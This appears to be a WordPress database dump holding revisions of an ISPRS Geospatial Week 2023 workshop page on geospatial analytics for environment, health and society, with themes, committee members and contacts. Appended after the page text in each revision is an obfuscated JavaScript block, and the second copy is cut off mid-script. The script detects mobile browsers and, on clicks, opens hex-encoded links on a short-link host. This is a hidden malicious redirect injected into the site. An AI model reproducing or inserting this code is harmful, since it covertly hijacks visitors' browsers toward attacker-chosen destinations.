for appropriate interventions by the authorities?</li>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p><strong><u>Scientific Committee:</u></strong></p>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p><u>Supporting ISPRS Working Groups:</u></p>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<p><u><strong>Special Issue dedicated to the workshop:</strong> </u></p>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p>iyyanki@gmail.com</p>\n<p>ivm@ieee.org[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:13:38','2022-12-07 04:13:38','',3427,'https://gsw2023.com/?p=3439',0,'revision','',0),
(3440,1,'2022-12-07 04:14:51','2022-12-07 04:14:51','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><u>Themes of the Workshop</u></strong></p>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p><strong><u>Scientific Committee:</u></strong></p>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li><strong> Weilian Li, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li><strong>Dr Nelly Lucero Ramírez Serrato, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p><u>Supporting ISPRS Working Groups:</u></p>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<p><u><strong>Special Issue dedicated to the workshop:</strong> </u></p>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 